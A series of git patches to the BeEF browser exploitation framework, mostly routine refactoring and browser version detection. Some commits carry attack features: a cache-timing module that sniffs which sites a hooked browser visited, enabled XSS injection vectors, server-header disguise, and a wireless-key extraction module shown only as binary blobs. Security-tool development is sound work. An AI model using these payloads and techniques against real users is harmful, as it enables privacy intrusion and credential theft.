From f0fab1c431e1c9c2cafa94cbef079bee38df6f4e Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Fri, 16 Mar 2012 11:12:10 +0100
Subject: [PATCH 01/31] Added rest-client gem dependency when running tests

---
 Gemfile | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Gemfile b/Gemfile
index 99b911ef9..2c7b9651e 100644
--- a/Gemfile
+++ b/Gemfile
@@ -49,6 +49,8 @@ if ENV['BEEF_TEST']
   # sudo apt-get install libxslt-dev libxml2-dev
   # sudo port install libxml2 libxslt
   gem "capybara"
+  #RESTful API tests/generic command module tests
+  gem "rest-client", "~> 1.6.7"
 end
 
 source "http://rubygems.org"

From 45475d625b3caa429f230ce631bb0a08cd1b4d06 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 22 Mar 2012 19:27:36 +1030
Subject: [PATCH 02/31] Updated IE version detection

No longer modifies the DOM for every call to:
	`isIE8()`
	`isIE9()`
	`isIE()`
---
 core/main/client/browser.js | 21 ++++++++++++++-------
 1 file changed, 14 insertions(+), 7 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index d831892b2..f4d83780b 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -48,9 +48,8 @@ beef.browser = {
 	 * Returns true if IE8.
 	 * @example: beef.browser.isIE8()
 	 */
-	isIE8: function() {						
-		$j("body").append('<!--[if IE 8]>     <div id="beefiecheck" class="ie ie8"></div>      <![endif]-->');
-		return ($j('#beefiecheck').hasClass('ie8'))?true:false;
+	isIE8: function() {
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !window.performance;
 	},
 	
 	/**
@@ -58,8 +57,7 @@ beef.browser = {
 	 * @example: beef.browser.isIE9()
 	 */
 	isIE9: function() {
-		$j("body").append('<!--[if IE 9]>     <div id="beefiecheck" class="ie ie9"></div>      <![endif]-->');
-		return ($j('#beefiecheck').hasClass('ie9'))?true:false;
+		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
 	},
 	
 	/**
@@ -166,12 +164,20 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
 	},
 
+	/**
+	 * Returns true if FF12
+* @example: beef.browser.isFF12()
+	 */
+	isFF12: function() {
+return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
 	},
 
 	/**
@@ -386,6 +392,7 @@ beef.browser = {
 			FF9:	this.isFF9(),	// Firefox 9
 			FF10:	this.isFF10(),	// Firefox 10
 			FF11:	this.isFF11(),	// Firefox 11
+			FF12:	this.isFF12(),	// Firefox 12
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -441,7 +448,7 @@ beef.browser = {
 		if (this.isFF9())	{ return '9'  };	// Firefox 9
 		if (this.isFF10())	{ return '10' };	// Firefox 10
 		if (this.isFF11())	{ return '11' };	// Firefox 11
-
+		if (this.isFF12())	{ return '12' };	// Firefox 12
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7

From b230b983361532c16d5e29c425c3dc72a9379906 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 25 Mar 2012 14:13:44 +1030
Subject: [PATCH 03/31] Changed `BeEF::API.registered?()` to use the
 `:is_matched_params` method

Fixes issue #500
---
 core/api.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/core/api.rb b/core/api.rb
index 3ad1bf391..0d845d02d 100644
--- a/core/api.rb
+++ b/core/api.rb
@@ -60,10 +60,9 @@ module BeEF
       # @param [String] method the method of the class
       # @param [Array] params an array of parameters that need to be matched
       # @return [Boolean] whether or not the owner is registered
-      # @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
       def registered?(owner, c, method, params = [])
         @registry.each{|r|
-          if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
+          if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
             return true
           end
         }

From 8518c8fae9dac929afccf1d7f85ec74e6a500945 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 26 Mar 2012 14:44:36 +1030
Subject: [PATCH 04/31] Renamed History Extraction module to Get Visited
 Domains

Added 4 links for Firefox
---
 .../{get_history => get_visited_domains}/command.js      | 9 ++++++++-
 .../{get_history => get_visited_domains}/config.yaml     | 4 ++--
 .../{get_history => get_visited_domains}/module.rb       | 2 +-
 3 files changed, 11 insertions(+), 4 deletions(-)
 rename modules/browser/{get_history => get_visited_domains}/command.js (95%)
 rename modules/browser/{get_history => get_visited_domains}/config.yaml (93%)
 rename modules/browser/{get_history => get_visited_domains}/module.rb (93%)

diff --git a/modules/browser/get_history/command.js b/modules/browser/get_visited_domains/command.js
similarity index 95%
rename from modules/browser/get_history/command.js
rename to modules/browser/get_visited_domains/command.js
index a7f286c19..d2c04fac1 100644
--- a/modules/browser/get_history/command.js
+++ b/modules/browser/get_visited_domains/command.js
@@ -79,7 +79,14 @@ if (beef.browser.isFF() == 1) {
 	  { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
 	  { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
 	  { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
-	  { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] }
+	  { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
+      { 'category': 'Coding' },
+      { 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
+      { 'category': 'Security' },
+      { 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
+      { 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
+      { 'category': 'Email' },
+      { 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
 	];
 	/*************************
 	 * CONFIGURABLE SETTINGS *
diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_visited_domains/config.yaml
similarity index 93%
rename from modules/browser/get_history/config.yaml
rename to modules/browser/get_visited_domains/config.yaml
index 167088243..dfcab7cf8 100644
--- a/modules/browser/get_history/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -15,10 +15,10 @@
 #
 beef:
     module:
-         get_history:
+         get_visited_domains:
             enable: true
             category: "Browser"
-            name: "History Extraction"
+            name: "Get Visited Domains"
             description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
             authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
             target:
diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_visited_domains/module.rb
similarity index 93%
rename from modules/browser/get_history/module.rb
rename to modules/browser/get_visited_domains/module.rb
index 9ffe12fa1..8effcac55 100644
--- a/modules/browser/get_history/module.rb
+++ b/modules/browser/get_visited_domains/module.rb
@@ -14,7 +14,7 @@
 #   limitations under the License.
 #
 
-class Get_history < BeEF::Core::Command
+class Get_visited_domains < BeEF::Core::Command
 
   def post_execute
     content = {}

From 2bca21a41d372289ef68ba9809ca0bfb03a0dcaf Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 26 Mar 2012 16:29:15 +1030
Subject: [PATCH 05/31] Minor updates to XSSRays

Part of issue #47
---
 core/main/client/net/xssrays.js                | 18 +++++++++---------
 .../admin_ui/controllers/xssrays/xssrays.rb    |  6 +++---
 extensions/xssrays/handler.rb                  |  2 +-
 3 files changed, 13 insertions(+), 13 deletions(-)

diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js
index 2db324759..93091680f 100644
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -50,19 +50,19 @@ beef.net.xssrays = {
     vectors: [
 
 //				  {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
-//        {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
-        {input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
-		{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
+				  {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
+//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
+//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
 //				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//        {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
+//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
-        //{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
+  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
+  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
     ],
     uniqueID: 0,
     rays: [],
diff --git a/extensions/admin_ui/controllers/xssrays/xssrays.rb b/extensions/admin_ui/controllers/xssrays/xssrays.rb
index 31d5903ad..c951f62e5 100644
--- a/extensions/admin_ui/controllers/xssrays/xssrays.rb
+++ b/extensions/admin_ui/controllers/xssrays/xssrays.rb
@@ -80,7 +80,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
       )
       xssrays_scan.save
 
-      print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
+      print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
     end
 
    end
@@ -116,7 +116,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
       )
       xssrays_scan.save
 
-      print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
+      print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
     end
    end
 end
@@ -124,4 +124,4 @@ end
 end
 end
 end
-end
\ No newline at end of file
+end
diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb
index ac008c318..06618e709 100644
--- a/extensions/xssrays/handler.rb
+++ b/extensions/xssrays/handler.rb
@@ -77,7 +77,7 @@ module BeEF
             )
             xssrays_detail.save
           end
-          print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
+          print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
           print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
         end
 

From b88acd98c8a539d241c88bf149c79a60c4a9e425 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 29 Mar 2012 14:24:15 +0200
Subject: [PATCH 06/31] Added BeEF router superclass: it will be extended by
 other classes when sub-routes are needed.

---
 core/bootstrap.rb          |  5 +++++
 core/main/router/api.rb    | 30 ++++++++++++++++++++++++++++++
 core/main/router/router.rb | 33 +++++++++++++++++++++++++++++++++
 3 files changed, 68 insertions(+)
 create mode 100644 core/main/router/api.rb
 create mode 100644 core/main/router/router.rb

diff --git a/core/bootstrap.rb b/core/bootstrap.rb
index 2ce5f8643..148136e79 100644
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -19,6 +19,11 @@ module BeEF
   end
 end
 
+## @note Include the BeEF router
+require 'core/main/router/router'
+require 'core/main/router/api'
+
+
 ## @note Include http server functions for beef
 require 'core/main/server'
 require 'core/main/handlers/modules/beefjs'
diff --git a/core/main/router/api.rb b/core/main/router/api.rb
new file mode 100644
index 000000000..7bad31f33
--- /dev/null
+++ b/core/main/router/api.rb
@@ -0,0 +1,30 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Router
+
+      module RegisterRouterHandler
+        def self.mount_handler(server)
+          server.mount('/', BeEF::Core::Router::Router.new)
+        end
+      end
+
+      BeEF::API::Registrar.instance.register(BeEF::Core::Router::RegisterRouterHandler, BeEF::API::Server, 'mount_handler')
+
+    end
+  end
+end
diff --git a/core/main/router/router.rb b/core/main/router/router.rb
new file mode 100644
index 000000000..88ecccee8
--- /dev/null
+++ b/core/main/router/router.rb
@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Core
+    module Router
+      class Router < Sinatra::Base
+
+        config = BeEF::Core::Configuration.instance
+        configure do set :show_exceptions, false end
+        not_found do 'Not Found' end
+
+        get '/' do
+          'Try harder...muahah!'
+        end
+
+      end
+    end
+  end
+end
\ No newline at end of file

From addc256b8ced7071d41e6c08d3f8495dc4f5f13c Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 29 Mar 2012 15:00:20 +0200
Subject: [PATCH 07/31] Remove route "/" from the main router class. Must
 return 'not found' anyway.

---
 core/main/router/router.rb | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 88ecccee8..e7bcf9c9f 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -23,10 +23,6 @@ module BeEF
         configure do set :show_exceptions, false end
         not_found do 'Not Found' end
 
-        get '/' do
-          'Try harder...muahah!'
-        end
-
       end
     end
   end

From 59ac216b71bdc426bec6a07d8b56040d88ba4ea4 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sat, 31 Mar 2012 13:24:30 +0100
Subject: [PATCH 08/31] Added basic web-server imitation (overriding Server
 response headers, added config.yaml options).

---
 config.yaml                |  5 +++++
 core/main/router/router.rb | 23 +++++++++++++++++++++++
 2 files changed, 28 insertions(+)

diff --git a/config.yaml b/config.yaml
index 679d183f6..08eff1b27 100644
--- a/config.yaml
+++ b/config.yaml
@@ -37,6 +37,11 @@ beef:
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+                        enable: false
+                        #supported: apache, iis
+                        type: "apache"
 
     database:
         # For information on using other databases please read the
diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index e7bcf9c9f..0dcabdadf 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -23,6 +23,29 @@ module BeEF
         configure do set :show_exceptions, false end
         not_found do 'Not Found' end
 
+        before do
+          # @note Override Server HTTP response header
+          if config.get("beef.http.web_server_imitation.enable")
+             type = config.get("beef.http.web_server_imitation.type")
+             case type
+               when "apache"
+                headers "Server" => "Apache/2.2.3 (CentOS)"
+                #todo https://github.com/beefproject/beef/issues/98 if web_server imitation is enabled
+                #todo the 404 response will be something like the following:
+                #<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+                #<html><head>
+                #<title>404 Not Found</title>
+                #</head><body>
+                #<h1>Not Found</h1>
+                #<p>The requested URL /aaaa was not found on this server.</p>
+                # <hr>
+                # <address>Apache/2.2.3 (CentOS)</address>
+                # </body></html>
+               when "iis"
+                headers "Server" => "Microsoft-IIS/7.0"
+             end
+          end
+        end
       end
     end
   end

From 5474f0507a12da9bbd68b6baa3239cdcbabfddb6 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sat, 31 Mar 2012 13:27:59 +0100
Subject: [PATCH 09/31] Allowing also GET method on
 Access-Control-Allow-Methods (dynamic handler).

---
 core/main/network_stack/handlers/dynamicreconstruction.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/network_stack/handlers/dynamicreconstruction.rb b/core/main/network_stack/handlers/dynamicreconstruction.rb
index d2e41a4f4..6b2afa2e3 100644
--- a/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -54,7 +54,7 @@ module Handlers
               'Expires' => '0',
               'Content-Type' => 'text/javascript',
               'Access-Control-Allow-Origin' => '*',
-              'Access-Control-Allow-Methods' => 'POST'
+              'Access-Control-Allow-Methods' => 'POST, GET'
             }
         )
 

From 2db4885c2f2649fae5e572c89e86dce156752bcf Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sat, 31 Mar 2012 13:57:18 +0100
Subject: [PATCH 10/31] Added comments in the main Router class.

---
 core/main/router/router.rb | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 0dcabdadf..c21c089f5 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -17,6 +17,9 @@
 module BeEF
   module Core
     module Router
+
+      #@note This is the main Router parent class.
+      #@note All the HTTP handlers registered on BeEF will extend this class.
       class Router < Sinatra::Base
 
         config = BeEF::Core::Configuration.instance
@@ -30,6 +33,7 @@ module BeEF
              case type
                when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)"
+
                 #todo https://github.com/beefproject/beef/issues/98 if web_server imitation is enabled
                 #todo the 404 response will be something like the following:
                 #<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
@@ -41,6 +45,7 @@ module BeEF
                 # <hr>
                 # <address>Apache/2.2.3 (CentOS)</address>
                 # </body></html>
+
                when "iis"
                 headers "Server" => "Microsoft-IIS/7.0"
              end

From e528375e3df6df362b1f5f05393bbebcbcb3ff45 Mon Sep 17 00:00:00 2001
From: Keith Lee <keith.lee2012@gmail.com>
Date: Mon, 2 Apr 2012 14:40:32 -0400
Subject: [PATCH 11/31] Save wireless configuration xml created by
 Get_wireless_keys module to temp folder

---
 .../wirelessZeroConfig.class                  | Bin 2818 -> 3238 bytes
 .../get_wireless_keys/wirelessZeroConfig.jar  | Bin 3285 -> 3519 bytes
 .../get_wireless_keys/wirelessZeroConfig.java |   6 +++++-
 3 files changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.class b/modules/host/get_wireless_keys/wirelessZeroConfig.class
index cb5a0838e11cb355019ff1b9bc333bc4d5c053cb..8f4d9d53f0f9415b24d40459f4d472fa9bf4a580 100644
GIT binary patch
delta 1605
zcmZvcS#T6p6o$V$TX#C0g^4VqDXNsk5intq1STp=Ab{)!5+($2NQN*FGBGnOvW?;n
zZrCntZYTs16oSqWqKF$VRX$kdt7ZAZyDwTw%6M)M!56E#&OP_^fBtjtIe+)QVJAbG
zAO5*?8JNuX7BguoU<Ru#G0i4xEY`Bl<ROa~>rGm8ywxObvcaUyWTQdCqL?O&O>EYt
z-C&DBheeW3i!vUz2-2lZN|U6u*=n-QWV?2Em>C|?&Q6nEdflz*_GtWGgN(_eCXea(
zK9k1{p0Eh(Vqu;%c}lNOYy2~XJj;G<4p=;=V_}{*c){dFlb0;H+d*w!HgGJedBxyW
zi|P7o(+Tc1dClZ?UF49#VS^(F2Rf^Y>eI27&5L85D`M;0;|50+R$DyXnCNItZcoXz
z4UV~2%^18PrG#2oot>(#rj|K2vzTqOk_JgjrYg3@yHbf{hrydRZ}GOmTU9YpNNwKX
zxVxKVvxxc5b+xPTU7PnfVRMph=P^%p=9tYX-nXgcv^F2uoMFDrS#3V#BZaRyHGZ@L
zn{%9(?ONH}^l(9;A~qlMiA|Q{HaX@f$~MKe#VQlY$^}d3?r4d3rsZIYVjZnWBrDQe
zI$IN6l38hUkzR#gH7kZYzXgU*wYfx}U^gV%;}xlRXRIrhPIlRRs*my+m!%appVMG-
zg)a=g)cCKQsJGgz<!hU7XmAdB%e}Q+b#mSb-f#KNx#pc#k?u-#v?+$T2WyXYv{f$a
zO18vPDMiqYZA~ZID;K2WZaJsax5!EQ4qPbqSE<5yM{BAvk>02n>ip!pMKw8B0yPC@
zI$7_sI<o>}o!x;NZ+W=Z`881P+-j`K%n+S}qCihcyny&JG_iAKce||8O#I_=sPitc
zPOODTYzaO}C2=0}Z@|l4F!*}#oV$tEl!*Kl3vLp33WMfwem5q0J=8g4%u(S7Bv6E}
zpOFR&|Hkj}3A-pE&+ZN5XNa6N>#Q+*GQrUo@kh*%861;k>=DL_cc<%>_YscfxGQ94
z85bNcFj=!q5U`Qu?nptXpqC28VS2S!sYDPHBi2PqZzPTveCZuoCWWj)Ptvmti4^uR
zIqIS^gZxtj;^Kn$<jdrk8nHumma4-v^idrR**T^~iu#xy4He~xM2h<e3QJiuRGedI
zj$x6KP)U~I(Mai4M&3Atv`{mb=1DK$=^pqcRGg)zd!V)(zw>iJS;<*-j#1J_J(J^v
zoj(dzXXeo>9s5yweNB4zCySMrB`VA^wUp(mk$SbB6>1ABRfa~jpH=DvP3knw>MU!8
zZ;k3<9eNa}C?1fXLZJ*J|48qZ!D53Y21_L*`nXP=e*gn>5R{Rqi$b8wR6kSXO+NvH
z<pUg~bPzWPbN9<#E36M1)Elf2dgy12ga<@q*8eBLUwCHgDk2m4y|^;jgJ{g-DsDvZ
zUU&8*7LE(vm*xJW7`|?N-ZOHye9!VaZjtm>_r|jCXP8u*sW550sn(G$pL`s_+hh>`
PeFu4E+wyjm%NhL_sO~|0

delta 1208
zcmYL|>sypX7{-6I2jAIuhl5K3dsSRlqKTj&gkUd;8HON`5{9nlEjL`lU4#WPvn@Mm
zDOqn>X6J)+&_d{X*W#)#9X|A>{(-*rC-hmH*(LgN&;88YbI;84%yT7rx;*>)%^!XO
z8kw_cqbGzzudSg^@{rATc1Zed9%ewY)67328I<gj?3TnV_Sh8DW3!ii2KHMVusCRQ
zh`3D|kJ?0d%)nt|k}&YNWJq$v(4@?A)Q~46!)82Y>{3Rbwiq$N@i3!|8OYd-Ghs1l
zQ)7;-;YkB04Cv{nBqt?L+pOi3foCkTHcdQh@tjSwxk@u>$!W>+=BO7eUbGM|xus$x
zY!4+eyOOEH>B%wI6P<1CY*O6EMnxxE1$KI@ej+hCmQ1HCURIpptiaz=zs}+n#jBjl
zM~#XH>2O<pC&T9zQ@p0Q!0YahzSh1s6fSQn+Ih>sMaA26DBdw}iFXBoePeYi1Sl@^
zo(>P_Sn)m|2!x~fkdG7}b58LIo7~O*@;eou@|nfwiYshYO!I}smx{0G5LCERR)wwj
znyUt`xxe^ZSGDtv;#>2Yilgy~ctbMX(3u=gbf-qfGXt5?MEsb!*^Ik9u*QF#S+_s1
z!TmMRzO*#29*(Dm8ni5#8gfPOyn7*V+uT&JMYwfVby*}Y8P6n#8@e-z(Re03>h@Y2
zLo$<I*z)(1HutPGnRWCZ13}0nSF<IW>s)KRUq^T8QRjeQZ4Pl=6TxPUHa?9d1Sr)T
zAE0AFen(ymfmwVri)v$u{(6Efi^lu4gYj^)veB<i-8oskEM%%xu=1@ZsLc_l+?#SX
z8?`)EI5H}~XQj~f`OdJr1s<!M&<#rGsfp!SUFT6-y4<5K8v2iUtnpat*z>H7EvO>(
zdNHqvG-#$3Io3JhXxO9i5`*(J#iHRH_c&^v=2%qaII`X;nkS+S%3{%?9LsW)JH^pr
zkBXR6@*7nP&idKLx}@Mbhj04UU(q6umg!qv(*zxv&x?;rt}#P3vmzrV^;pR2MOM0h
z+IzEI{7g50u#JD{73K7aDz=N&>=4cLi%teaKRd-RgW@>5MTR}vBPLGhW)GR>C?rs~
zmQORNjI`b$=uz2I8`<D-?`5pOGy(tB#rhPgc~I{@gruu!u}D>U1N|o=x9hk3U;aWt
Mm0s=ECO)?P3&LLL7ytkO

diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.jar b/modules/host/get_wireless_keys/wirelessZeroConfig.jar
index 7bccf01b3087429f4901eb6f4e0f4ee96f8b1e70..254bcd2e0aa2e0519a781d0602b002a225ce4eda 100644
GIT binary patch
delta 3142
zcmZ9OX*d*I8^`VI3=uIN`(qhoHxjaj!dQxIkzpviQI;$XV{MG31|xeJTe4-%Qkus$
z#@3XjOeuSeY}rP5^`-ZD-*c{W-S;^k&bj~Bb)W118wb7l3ut4($izp-b~^F*P>+BL
z$TP9uE@g%fR2mygf}MlM<fkMg`Iua#KKNboQO@;KjEP#KanG#l!k8)24k?(pYhKNd
zBvZfYM93T>I1~azIZM4wtOsEr#te!fNxtIRXj$eg)#b`~ERT@;Yh!>@35TDnW|0$m
zwyBXwzk2eWdvP~Lwe6l+<Ew==+99o8TKa;GSj*X6MjH!Owy~#f-Dz}mbXlkCe+#9k
zAQ@K5p}OwCYA#2a_8wQu<dX?+8}D22{qN)V)i!qv9$44l7f1f;R#3UIlUE{z{-?y-
z2^Eyhv>Hro=6&;2W28XccTU6+wPhw-J2JB$IA|psebcIJ%75v#$KsYYppyQ_SN<7{
z{<0MM7Fkea+^zH)q`b8>bj;~qMgH>s3G#14f!=;<j3QbWau}7Xess}J<dWQU<Y5e3
zJUZN9tOU^Hz9wX89i^Cs$;)v$G?QL_wGDwfFq7P?u#K=BWl{NdT*vPB*ckfXQZZH`
ztRGKh0_p!xs=?{upK<0igPPbGDqgk1axegpue<xI#uwl17UCWi`WT+wHjI~9?6SmQ
zk|-<%{x3d74_RJ&0brr9nP52ca<_naxi5ivf_3NJy*=O_9-Dg_2-UBN)i5}-Zxus+
zx9}iAW{6M7AM7p8FdNLaowVqcgD(d&;iPi#=l<#W_^vk*z+^CclTh&b3DM-B_rM1!
